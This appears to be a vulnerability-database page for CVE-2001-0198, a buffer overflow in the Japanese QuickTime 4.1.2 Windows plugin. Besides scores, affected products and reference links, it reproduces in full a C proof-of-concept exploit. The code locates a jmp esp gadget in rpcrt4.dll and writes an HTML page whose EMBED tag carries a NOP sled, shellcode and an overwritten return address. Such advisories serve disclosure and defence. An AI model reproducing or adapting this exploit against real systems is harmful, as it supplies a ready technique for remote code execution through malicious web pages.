CVE-2001-0198
CVSS 7.6
Published: 2001-05-03 00:00:00
Last revised: 2016-10-17 22:10:11

[Original] Buffer overflow in QuickTime Player plugin 4.1.2 (Japanese) allows remote attackers to execute arbitrary commands via a long HREF parameter in an EMBED tag.


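[CNNVD] QuickTime Player plugin buffer overflow vulnerability (CNNVD-200105-020)

        A buffer overflow vulnerability exists in QuickTime Player plugin 4.1.2 (Japanese). A remote attacker can execute arbitrary commands via an overly long HREF parameter in an EMBED tag.

- CVSS (base score)

CVSS score: 7.6 [Severe (HIGH)]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]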

- CPE (affected platforms and products)

cpe:/a:apple:quicktime:4.1.2:::japanese
cpe:/a:apple:quicktime:4.1.2 Apple Quicktime 4.1.2

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0198
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0198
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200105-020
(Official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=98096678523370&w=2
(UNKNOWN)  BUGTRAQ  20010131 [SPSadvisory#41]Apple Quick Time Plug-in Buffer Overflow
http://www.exploit-db.com/exploits/20605
(UNKNOWN)  EXPLOIT-DB  20605
http://www.securityfocus.com/bid/2328
(VENDOR_ADVISORY)  BID  2328
http://xforce.iss.net/static/6040.php
(VENDOR_ADVISORY)  XF  quicktime-embedded-tag-bo

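- Vulnerability information

QuickTime Player plugin buffer overflow vulnerability
High risk  Buffer overflow
2001-05-03 00:00:00 2006-06-15 00:00:00
Remote ※ Local
        A buffer overflow vulnerability exists in QuickTime Player plugin 4.1.2 (Japanese). A remote attacker can execute arbitrary commands via an overly long HREF parameter in an EMBED tag.

- Advisories and patches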

        Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .

- Vulnerability information (20605)

Apple Quicktime plugin - Windows 4.1.2 (Japanese) Remote Overflow Vulnerability (EDBID:20605)
windows remote
2012-08-18 Verified
0 UNYUN
N/A
source: http://www.securityfocus.com/bid/2328/info

Apple Quicktime plugin for Windows is vulnerable to a remote buffer overflow.

A maliciously-constructed web link statement in a remote HTML document, which contains excess data argumenting an EMBED tag, could permit execution of hostile code. 

/*====================================================================
   Apple QuickTime 4.1.2 plug-in exploit
   The Shadow Penguin Security (http://shadowpenguin.backsection.net)
   Written by UNYUN (shadowpenguin@backsection.net)
  ====================================================================
*/

#include    <stdio.h>
#include    <stdlib.h>
#include    <windows.h>

#define MOV_FILE    "c:\\program files\\quicktime\\sample.mov"
#define HEIGHT      60
#define WIDTH       60
#define TARGET      "QUICKTIMEPLAYER"
#define FILE_IMAGE  \
                    "<html><embed src=\"%s\" href=\"%s\" "\
                    "width=%d height=%d autoplay=\"true\" "\
                    "target=\"%s\"><br></html>"
#define BUFSIZE     730
#define RET         684
#define ESP_TGT     "rpcrt4.dll"
#define JMPESP_1    0xff
#define JMPESP_2    0xe4
#define NOP         0x90

unsigned char   exploit_code[200]={
        0x33,0xC0,0x40,0x40,0x40,0x40,0x40,0x50,
        0x50,0x90,0xB8,0x2D,0x23,0xF5,0xBF,0x48,
        0xFF,0xD0,0x00,
};

main(int argc,char *argv[])
{
    FILE            *fp;
    char            buf[BUFSIZE];
    unsigned int    i,pretadr,p,ip,kp;
    MEMORY_BASIC_INFORMATION meminfo;

    if (argc<2){
        printf("usage : %s Output_HTML-fileName [Sample .mov file]\n",
               argv[0]);
        exit(1);
    }

    if ((void *)(kp=(unsigned int)LoadLibrary(ESP_TGT))==NULL){
         printf("%s is not found.\n",ESP_TGT);
         exit(1);
    }

    VirtualQuery((void *)kp,&meminfo,sizeof(MEMORY_BASIC_INFORMATION));
    pretadr=0;
    for (i=0;i<meminfo.RegionSize;i++){
        p=kp+i;
        if (  ( p     &0xff)==0
           || ((p>>8 )&0xff)==0
           || ((p>>16)&0xff)==0
           || ((p>>24)&0xff)==0) continue;
        if (   *((unsigned char *)p)==JMPESP_1
            && *(((unsigned char *)p)+1)==JMPESP_2)
            pretadr=p;
    }
    if ((fp=fopen(argv[1],"wb"))==NULL){
        printf("File write error \"%s\"\n",argv[1]);
        exit(1);
    }
    memset(buf,NOP,BUFSIZE);
    memcpy(buf+700-12,exploit_code,strlen(exploit_code));
    buf[BUFSIZE-2]=0;

    ip=pretadr;
    printf("EIP=%x\n",ip);
    buf[RET  ]=ip&0xff;
    buf[RET+1]=(ip>>8)&0xff;
    buf[RET+2]=(ip>>16)&0xff;
    buf[RET+3]=(ip>>24)&0xff;

    if (argc==2)
        fprintf(fp,FILE_IMAGE,MOV_FILE,buf,WIDTH,HEIGHT,TARGET);
    else
        fprintf(fp,FILE_IMAGE,argv[2],buf,WIDTH,HEIGHT,TARGET);
    fclose(fp);
    printf("Done.\n");
 }

-----
UNYUN
% The Shadow Penguin Security [ http://shadowpenguin.backsection.net ]
   shadowpenguin@backsection.net (SPS-Official)
   unyun@shadowpenguin.org (Personal)
% eEye Digital Security Team [ http://www.eEye.com ]
   unyun@eEye.com
		

- Vulnerability information (F115697)

Apple Windows Quicktime Plugin 4.1.2 Overflow (PacketStormID:F115697)
2012-08-18 00:00:00
Unyun  
exploit,remote,overflow
windows,apple
CVE-2001-0198

The Apple Quicktime plugin for Windows is vulnerable to a remote buffer overflow vulnerability.



    

- Vulnerability information

10560
Apple QuickTime Player (Japanese) EMBED Tag Handling Overflow
Context Dependent Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

- Timeline

2001-01-31 Unknown
2001-01-31 Unknown

- Solution

Products

Unknown or Incomplete

- Related references

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

Apple Quicktime Plugin Remote Overflow Vulnerability
Input Validation Error 2328
Yes Yes
2001-01-31 12:00:00 2009-07-11 04:46:00
Reported to bugtraq by UNYUN <shadowpenguin@backsection.net> on Wed, 31 Jan 2001.

- Affected software versions

Apple Quicktime plugin - Windows 4.1.2 (Japanese)
- Microsoft Windows 95
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0

- Discussion

Apple Quicktime plugin for Windows is vulnerable to a remote buffer overflow.

A maliciously-constructed web link statement in a remote HTML document, which contains excess data argumenting an EMBED tag, could permit execution of hostile code.

- Exploit

Apple QuickTime 4.1.2 plug-in exploit
The Shadow Penguin Security (http://shadowpenguin.backsection.net)
Written by UNYUN (shadowpenguin@backsection.net)

This sample code can be compiled by Visual C++ 6.0. This sample code was checked under the environment of Windows98 Second Edition (Japanese) + Internet Explorer 5.0.

- Solution

Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- Related references

     

     
